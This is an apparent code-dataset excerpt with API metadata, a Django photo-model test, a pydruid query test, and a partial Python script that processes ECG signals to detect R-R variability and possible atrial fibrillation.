"dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "threading.Thread", "line_number": 17, "usage_type": "attribute"}, {"api_name": "constants.APP_NAME", "line_number": 41, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_TOTALS_TABLE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 46, "usage_type": "attribute"}, {"api_name": "constants.ADDON_SUFFIX", "line_number": 57, "usage_type": "attribute"}, {"api_name": "progress.Progress", "line_number": 59, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 71, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 76, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 86, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 93, "usage_type": "attribute"}, {"api_name": 
"constants.DB_PATHS", "line_number": 114, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 114, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 116, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 117, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 118, "usage_type": "attribute"}, {"api_name": "utilities.execute_sql", "line_number": 121, "usage_type": "call"}, {"api_name": "utilities.execute_sql", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 135, "usage_type": "call"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 144, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 150, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 159, "usage_type": "attribute"}, {"api_name": "constants.REGION_ID_COLUMN_NAME", "line_number": 162, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 178, "usage_type": "call"}, {"api_name": "constants.DB_PATHS", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.STATEWIDE_DATASETS_DB", "line_number": 179, "usage_type": "attribute"}, {"api_name": "constants.DB_TIMEOUT", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sqlite3.OperationalError", "line_number": 190, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 191, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 191, "usage_type": "name"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 213, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 214, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 215, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 219, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 220, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 222, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 223, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 224, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 225, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 228, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 254, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 255, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 259, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", 
"line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 261, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 262, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 264, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 265, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 266, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 267, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 268, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 269, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 270, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 271, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 274, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 299, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 300, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 301, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 302, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 305, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 307, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 309, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 310, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 311, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 312, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 313, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 314, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 317, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 345, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 346, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODES_TABLE", "line_number": 350, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 351, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.CATEGORIES_TABLE", "line_number": 352, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", 
"line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.SEGMENTS_TABLE", "line_number": 353, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 354, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 356, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 357, "usage_type": "attribute"}, {"api_name": "constants.SEGMENT_ID_COLUMN_NAME", "line_number": 358, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 359, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 360, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 361, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 363, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 364, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 365, "usage_type": "attribute"}, {"api_name": "constants.CATEGORY_ID_COLUMN_NAME", "line_number": 368, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 392, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.COUNTIES_TABLE", "line_number": 396, "usage_type": "attribute"}, {"api_name": "constants.STARS_DB", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.JURISDICTIONS_TABLE", "line_number": 397, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 399, "usage_type": "attribute"}, {"api_name": "constants.TAC_COLUMN_NAME", "line_number": 400, "usage_type": "attribute"}, {"api_name": "constants.COUNTY_ID_COLUMN_NAME", "line_number": 401, "usage_type": "attribute"}, {"api_name": "constants.ID_COLUMN_NAME", "line_number": 402, "usage_type": "attribute"}, {"api_name": "constants.BUSINESS_CODE_ID_COLUMN_NAME", "line_number": 405, "usage_type": "attribute"}]}
+{"seq_id": "270111986", "text": "# -*- coding: utf-8 -*-\r\nfrom django.test import TestCase\r\nfrom apps.hello.models import Person\r\nfrom django.test.utils import override_settings\r\nfrom django.core.files.uploadedfile import SimpleUploadedFile\r\nimport os\r\nfrom django.conf import settings\r\nimport shutil\r\n\r\n\r\n@override_settings(MEDIA_ROOT=settings.MEDIA_TEST_ROOT)\r\nclass PersonModelTest(TestCase):\r\n\r\n def setUp(self):\r\n self.test_person = Person.objects.first()\r\n self.test_img_path = os.path.join(\r\n settings.BASE_DIR,\r\n 'assets/img/test_image.png'\r\n )\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_1 = SimpleUploadedFile(\r\n name='test_image_1.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_1\r\n self.test_person.save()\r\n self.first_photo_file = self.test_person.photo.path\r\n\r\n def tearDown(self):\r\n test_dir = os.path.exists(settings.MEDIA_TEST_ROOT)\r\n if test_dir:\r\n shutil.rmtree(settings.MEDIA_TEST_ROOT)\r\n\r\n def test_save_method(self):\r\n \"\"\"Check, if model save method,\r\n save first person photo to proper filesystem path,\r\n and crop image to proper size\"\"\"\r\n self.assertTrue(os.path.exists(self.first_photo_file))\r\n self.assertEqual(\r\n self.first_photo_file,\r\n settings.MEDIA_TEST_ROOT + self.test_person.photo.name\r\n )\r\n self.assertTrue(\r\n self.test_person.photo.width <= 200 and\r\n self.test_person.photo.height <= 200\r\n )\r\n\r\n def test_save_method_remove_unused_img(self):\r\n \"\"\"Check, if model save method delete unused images\"\"\"\r\n with open(self.test_img_path, 'rb') as test_img:\r\n self.test_image_2 = SimpleUploadedFile(\r\n name='test_image_2.png',\r\n content=test_img.read(),\r\n content_type='image/png'\r\n )\r\n self.test_person.photo = self.test_image_2\r\n self.test_person.save()\r\n self.second_photo_file = self.test_person.photo.path\r\n self.assertTrue(os.path.exists(self.second_photo_file))\r\n self.assertFalse(os.path.exists(self.first_photo_file))\r\n", "sub_path": "apps/hello/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "apps.hello.models.Person.objects.first", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.hello.models.Person.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "apps.hello.models.Person", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 33, 
"usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.test.utils.override_settings", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}]}
+{"seq_id": "168907501", "text": "import os\nimport pytest\nfrom pydruid.client import PyDruid\nfrom pydruid.utils.aggregators import doublesum\nfrom pydruid.utils.filters import Dimension\n\nclass TestCube:\n def test_cube_query(self):\n \tquery = PyDruid(\"http://pipeline.qiniu.com\", 'v2/stream/cubes/query')\n \tquery.set_qiniu(\"\", \"\")\n \ttop = query.topn(\n \t\t\tdatasource='domain_top_statics',\n \t\t\tgranularity='all',\n \t\t\tintervals='2019-08-13/pt1h', # utc time of 2014 oscars\n \t\t\taggregations={'count': doublesum('count')},\n \t\t\tmetric='count',\n \t\t\tdimension='Country',\n \t\t\tthreshold=10)\n \tdf = query.export_pandas()\n \tprint(df)\n \ttop.export_tsv('top.tsv')\n \n", "sub_path": "tests/test_qiniu.py", "file_name": "test_qiniu.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pydruid.client.PyDruid", "line_number": 9, "usage_type": "call"}, {"api_name": "pydruid.utils.aggregators.doublesum", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "653101139", "text": "# This script helps to plot ECG signals. \n\nimport pandas as pd\nfrom plotly import graph_objs\nfrom plotly import tools\nfrom plotly.offline import plot\nfrom django.conf import settings\n\nfrom scipy import signal\nfrom scipy.signal import find_peaks_cwt\nfrom numpy import polyfit\nimport numpy as np\nimport math\n\nfrom .detect_peaks import detect_peaks\n\ndef frange(x, y, jump):\n '''\n Crea una lista de numeros para la division\n de la senal por ploques de jump segundos\n '''\n while x < y:\n yield x\n x += jump\n\n\ndef signal_processing(file_name, divide_plots=False):\n\n print('***************************************************')\n print('---------------------------------------------------')\n\n ## ---------------- Datos de Eventos PLOTS ---------------\n tiempos_plots = []\n bpm_plots = []\n x_plots = []\n y_plots = []\n rrmean_values_plots = []\n rr_variability_plots = []\n rrmean_plots = []\n rr_variabilitysum_plots = []\n\n ## ---------------- Se adquiere la senal -----------------\n path = '/data/'\n df = pd.read_csv(settings.MEDIA_ROOT+path+file_name)\n\n try:\n x=df['X']\n y=df['Y']\n except:\n df = pd.read_csv(settings.MEDIA_ROOT+path+file_name, sep=';')\n\n x=df['X']\n y=df['Y']\n \n # Frecuencia de Muestro\n Fs = 300\n rateBPM = 60\n\n ## ---------- ACONDICIONAMIENTO DE LOS VALORES X ----------\n # Entre 1000, porque asi son dados los valores\n x = np.array(x)\n y = np.array(y)\n # Para empezar en el segundo 5\n try:\n x = x[1500:10000]\n y = y[1500:10000]\n except:\n pass\n x = (x/1000.0)-1 # Para empezar desde 0 segundos\n y = y/1000.0\n \n # Inicio de muestra (segundos)\n x_inicio1 = x[0]\n x_decimal = x_inicio1-math.floor(x_inicio1)\n x_inicio = (x_decimal * 0.999) / 0.299 + math.floor(x_inicio1) \n # Final de muestra (segundos)\n x_final1 = x[-1]\n x_decimal_fin = x_final1 - math.floor(x_final1)\n x_final = (x_decimal_fin * 0.999) / 0.299 + math.floor(x_final1) \n \n # TIEMPO Total de la SENAL\n tiempo_total = x_final - x_inicio\n\n # Formamos el axis x (segundos) (CON ESTO PROCESAMOS)\n t = np.linspace(x_inicio, x_final, y.size, endpoint=True)\n # El Y para PLOT (y_final)\n y_final = []\n\n ## -------------------- Datos ---------------------\n # BPM (Latidos por MINUTO (60 segundos))\n taquicardia = 100.0 # Mayor que\n bradicardia = 60.0 # Menor que\n # Separacion de PICOS (1 Hz - 1.667 Hz (2 Hz))\n taquicardia_seg = 60/taquicardia # Menor que 0.6 segundos\n bradicardia_seg = 60/bradicardia # Mayor que 1.0 segundos\n # En milisegundos\n taquicardia_mili = 600.0 # Menor que 600 milisegundos\n bradicardia_mili = 1000.0 # Mayor que 1000 milisegundos\n\n ## ------------- CONVERSION DE BITS --------------- \n num_bits = 12.0\n max_volt = 3.3\n y = (max_volt * y)/(2^int(num_bits))\n #--------------------------------------------------\n\n ## --------------- PROCESAMIENTO -----------------\n # Por encima de 10 segundos (tiempo total)\n segundos_bloque = 15.0\n sobra_bloque = tiempo_total/segundos_bloque\n bloques = list(frange(x_inicio, x_final, segundos_bloque))\n\n # contador de figuras\n cont_fig = 2\n\n # ultimo loop\n last_loop = False\n\n # Para R-R\n rr_values_all = []\n rr_values_all_plot = []\n rr_mean_values_all = []\n rrmean_values = []\n rr_mean_prom = 0\n rr_up_mean_values_all = []\n rr_down_mean_values_all = []\n RRv_all = []\n RRv_all_plot=[]\n rr_mean = 0\n RRv_suma_all = []\n\n # Para saber si plotear ultima parte\n ploteosiono = False\n\n y_peaks=[]\n t_peaks = []\n picos_todos = []\n \n ## Resultado\n values = {'FA': 
False, 'ARRITMIA': False, 'ARRITMIA_GENERAL': False}\n    values['suficiente_tiempo'] = True\n\n    # PROCESAMIENTO:\n    if tiempo_total > segundos_bloque: # Por encima de 10 segundos (tiempo total)\n        for i in bloques:\n            # EVITAR bloque menor a 5 segundos\n            ultimate_i = i + segundos_bloque # Proximo bloque\n            if (ultimate_i < x_final) and ((x_final-ultimate_i) < (segundos_bloque/2)):\n\n                # Datos de BLOQUE\n                indice_mayores = (i <= t)\n                t_bloque_parcial = t[indice_mayores] # Para t\n                y_bloque_parcial = y[indice_mayores] # Para y\n                indice_menores = (t_bloque_parcial <= x_final)\n                t_bloque = t_bloque_parcial[indice_menores] # Para t\n                y_bloque = y_bloque_parcial[indice_menores] # Para y\n\n\n                last_loop = True\n            else:\n                # Datos de BLOQUE\n                indice_mayores = (i <= t)\n                t_bloque_parcial = t[indice_mayores] # Para t\n                y_bloque_parcial = y[indice_mayores] # Para y\n                indice_menores = (t_bloque_parcial <= (i + segundos_bloque))\n                t_bloque = t_bloque_parcial[indice_menores] # Para t\n                y_bloque = y_bloque_parcial[indice_menores] # Para y\n\n\n            # Filtro SALVITZKY para reducir ruido (y_smooth)\n            order_sgolay = 7\n            framelen = 21\n            # Asegurar que la cantidad de y_bloque es mayor que framelen\n            if not(len(y_bloque) > framelen):\n                order_sgolay = len(y_bloque)-2\n                framelen = len(y_bloque)-1\n                # Solo is es odd (impar) : order_sgolay < framelen\n                if (framelen%2) != 1:\n                    order_sgolay = order_sgolay-1\n                    framelen = framelen-1\n                print('Se cambio el orden de Savitzky Golay\\n')\n\n            y_smooth = signal.savgol_filter(y_bloque, framelen, order_sgolay)\n\n\n            # DETREND (Quitar la tendecia de la senal) (y_detrend)\n            p = polyfit((np.arange(len(y_smooth))),y_smooth,6)\n            f_y = np.polyval(p,(np.arange(len(y_smooth))))\n            y_detrend = y_smooth - f_y\n\n\n            # MULTIPLICACION por si misma\n            y_var = y_detrend * y_detrend\n            y_var = y_var * 100 # 10 (valor a milivoltios)\n            y_normal = y_var\n\n\n            # DETECCION de PICOS\n            y_max = max(y_normal)\n\n            # umbral minimo del pico de la senal\n            min_peak_value = y_max*0.4\n\n            # umbral minimo de pico (TEORICO)\n            min_peak_value_theory = 0.2\n            # Los picos deben ser si o si mayores a 0.29\n            if not(min_peak_value >= min_peak_value_theory):\n                print('El pico minimio es menor a '+str(min_peak_value_theory))\n                min_peak_value = min_peak_value_theory\n            # Picos: valores\n            index_peaks = detect_peaks(y_normal, mph=min_peak_value, mpd=0.3, show=False) # primer valor probado 0.150\n\n            if len(index_peaks) == 0:\n                break\n            t_peaks = t_bloque[index_peaks]\n            y_peaks = y_normal[index_peaks]\n\n            #Colocar todos los picos:\n            for peak in y_peaks:\n                picos_todos.append(peak)\n\n            # RR-VARIABILITY\n            RRv_suma = 0\n            RRv_variamucho = False\n            minimo_variacion = 0.6 ##CAMBIAR? 
por el momento bien 0.6 1.5\n porcentaje_prematuridad = 0.78\n\n # RR - INTERVALOS\n rr_values = []\n rr_promedio = 0\n RRv_suma_porcentaje = []\n # RR-MEAN\n fuerade_rrmean = False\n\n # MINIMO 10 picos\n if (len(y_peaks)> 9):\n # RR - VARIABILITY\n for i2 in range(len(y_peaks)-2):\n # No deberia haber variacion (RRv = 0)\n RRv21 = (t_peaks[i2+1]-t_peaks[i2])\n RRv32 = (t_peaks[i2+2]-t_peaks[i2+1])\n RRv_suma = RRv_suma + abs(RRv32 - RRv21)\n RRv_suma_all.append(abs(RRv32 - RRv21)) #Plots\n\n # Porcentaje\n if (1-(abs(RRv21-RRv32)/(RRv21))):\n RRv_suma_porcentaje.append(abs(RRv32 - RRv21))\n\n if RRv_suma > minimo_variacion:\n RRv_variamucho = True\n \n\n # RR - INTERVALOS (segundos)\n for i3 in range(1,len(t_peaks)):\n # se guarda valor intervalo RR\n pulso_ant = t_peaks[i3-1]\n pulso_act = t_peaks[i3]\n rr_values.append(pulso_act - pulso_ant)\n \n # de RRv para plot!!\n RRv_hahas = [RRv_suma]*len(rr_values) ## REVISAR DESCOMENTAR\n #RRv_hahas = RRv_suma_sola*len(rr_values) \n for RRv_haha in RRv_hahas:\n RRv_all.append(RRv_haha)\n \n \n rr_suma = sum(rr_values)\n rr_promedio = sum(rr_values)/len(t_peaks)\n \n # Asignamos al rr_values total\n for rr_val in rr_values: ## REVISAR!!\n rr_values_all.append(rr_val)\n \n # MEAN R-R Interval (se toma rr_values anterior)\n rr_mean = 0\n for i4 in range(0,len(rr_values)):\n rr_mean = 0.75*rr_mean+0.25*rr_values[i4]\n rrmean_values = [rr_mean]*len(rr_values)\n # Asignamos al rr_mean valores totales\n for rrmean_value in rrmean_values:\n rr_mean_values_all.append(rrmean_value)\n\n # Valores R-R Limites\n up_rr_true = [] # Los valores mayores a \n up_mean_rrvalues = [i21 for i21 in rr_values if i21 >= (rr_mean*1.35)] #2.5+0.5##ESSTO QUEDA\n \n down_rr_true = [] # Los valores mayores a \n down_mean_rrvalues = [i22 for i22 in rr_values if i22 <= (rr_mean*0.85)] #0.1-0.5\n\n \n if (len(up_mean_rrvalues) + len(down_mean_rrvalues)) > 1:\n fuerade_rrmean = True\n elif up_mean_rrvalues or down_mean_rrvalues:\n fuerade_rrmean = True\n\n\n # BEATS PER MIMUNTE\n rateBPM = len(y_peaks)*60.0/(t_bloque[-1]-t_bloque[0])\n #print('BPM: '+ str(rateBPM))\n\n # ---------------- FIBRILACION AURICULAR ----------------\n if (fuerade_rrmean==True) and (RRv_variamucho==True):\n values['FA'] = True\n tiempos_plots.append([t_bloque[0],t_bloque[-1]])\n x_plots.append(t_bloque)\n y_plots.append(y_smooth)\n rrmean_values_plots.append(rrmean_values)\n rr_variability_plots.append(rr_values)\n rr_variabilitysum_plots.append(RRv_suma_all)\n rrmean_plots.append(rr_mean)\n bpm_plots.append(rateBPM)\n values['ARRITMIA_GENERAL'] = True\n elif (fuerade_rrmean==True):\n values['ARRITMIA_GENERAL'] = True\n else:\n values['FA'] = False\n values['ARRITMIA'] = False\n\n # Para conteo de figuras\n cont_fig = cont_fig+1\n \n # Para formar el Y FINAL\n for y_i in y_detrend:\n y_final.append(y_i)\n\n # LOOP ULTIMO\n if last_loop:\n break\n \n\n else:\n values['suficiente_tiempo'] = False\n print('No se adquirio suficiente tiempo')\n\n\n values['rr_mean'] = rr_mean\n values['up_rr_mean'] = rr_mean*1.15\n values['down_rr_mean'] = rr_mean*0.85\n\n values['rateBPM'] = rateBPM\n values['cycles_num'] = len(picos_todos)\n values['cycles'] = []\n cycles = []\n values['tiempos_plots'] = tiempos_plots\n\n for i in range(0,len(y_peaks)-1):\n cycles.append('Intervalo R-R #'+str(i+1)+' - #'+str(i+2) +': '+str(rateBPM))\n \n values['cycles'] = cycles\n\n #--------------------------------------------------\n\n trace1 = graph_objs.Scatter(\n x=t, y=y_final, \n mode='lines', name='signal'\n )\n\n layout = 
graph_objs.Layout(title='ECG ('+file_name+')',\n plot_bgcolor='rgb(230, 230,230)')\n \n\n ## ----------------- R-R MEAN Interval Plot --------------\n x_values_mean = range(0, len(rr_values_all))\n \n ups_mean = []\n for rr_up_mean in rr_mean_values_all:\n ups_mean.append(rr_up_mean*1.35) #2.5+0.5\n x_values_mean1 = range(0, len(ups_mean))\n\n downs_mean = []\n for down_up_mean in rr_mean_values_all:\n downs_mean.append(down_up_mean*0.85) #0.1-0.5\n x_values_mean2 = range(0, len(downs_mean))\n \n \n trace2 = graph_objs.Scatter(\n x=x_values_mean,\n y=rr_values_all,\n mode='markers',\n name='Intervalos MEAN R-R'\n )\n trace3 = graph_objs.Scatter(\n x=x_values_mean1,\n y=ups_mean,\n name='Limite MEAN R-R'\n )\n \n trace4 = graph_objs.Scatter(\n x=x_values_mean2,\n y=downs_mean,\n name='Limite MEAN R-R'\n )\n # -----------------------------------------------------\n\n # ----------------R-R Interval Plot--------------------\n x_values = range(0, len(rr_values_all))\n x_RRv_suma_all = range(0, len(RRv_suma_all))\n #rr_values_prom = sum(rr_values_all)/len(rr_values_all)\n \n rr_up = [1.1]*len(x_values)#[15]*len(x_values)\n rr_down = [0]*len(x_values)#[0]*len(x_values)\n\n trace5 = graph_objs.Scatter(\n x=x_values,\n y=RRv_suma_all,#RRv_all,\n mode='markers',\n name='Intervalos R-R'\n )\n trace6 = graph_objs.Scatter(\n x=[0, len(x_values)],\n y=rr_up,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n name='Limite R-R'\n )\n trace7 = graph_objs.Scatter(\n x=[0, len(x_values)],\n y=rr_down,#[sum(RRv_all)/len(RRv_all)*0.85, sum(RRv_all)/len(RRv_all)*0.85],#y=[rr_mean_prom*0.85, rr_mean_prom*0.85],\n name='Limite R-R'\n )\n \n data = [trace1, trace2, trace3, trace4, trace5]\n fig = tools.make_subplots(rows=3, cols=1, subplot_titles=('ECG', 'R-R Variabilidad'))\n fig.append_trace(trace1, 1, 1)\n fig.append_trace(trace2, 2, 1)\n fig.append_trace(trace3, 2, 1)\n fig.append_trace(trace4, 2, 1)\n fig.append_trace(trace5, 3, 1)\n fig.append_trace(trace6, 3, 1)\n fig.append_trace(trace7, 3, 1)\n fig['layout']['xaxis1'].update(title='Segundos', range=[5, 15])\n fig['layout']['yaxis1'].update(title='Milivoltios')\n fig['layout']['plot_bgcolor']='rgb(230, 230,230)'\n fig['layout']['xaxis2'].update(title='Bloques')#, range=[0, len(x_values)] )\n fig['layout']['yaxis2'].update(title='R-R Intervalos')\n fig['layout']['xaxis3'].update(title='Bloques')#, range=[0, len(x_values)+5])\n \n plot_div = plot(fig, output_type='div', include_plotlyjs=False)\n\n # Si no se requiere plots, enviar 2 variables\n if divide_plots==False:\n return plot_div, values\n\n # --------------- Plots de Eventos -----------------\n event_plots = [] #Plots de eventos\n plot_cont = 0\n \n if len(tiempos_plots) > 0:\n for tiempos_plot in tiempos_plots:\n event_trace = graph_objs.Scatter(\n x=x_plots[plot_cont],\n y=y_plots[plot_cont],\n mode='lines',\n name = 'Evento Arritmico'\n )\n\n x_rr_plots = range(0, len(rr_variability_plots))\n event_trace2 = graph_objs.Scatter(\n x=x_rr_plots[plot_cont],\n y=rr_variability_plots[plot_cont],\n mode='markers',\n name='Variabilidad R-R'\n )\n\n rrmean_up_plots = []\n rrmean_up_plots.append(rrmean_plots[plot_cont]*1.35)\n rrmean_up_plots = rrmean_up_plots*len(rr_variability_plots[plot_cont])\n \n event_trace3 = graph_objs.Scatter(\n x=[0, 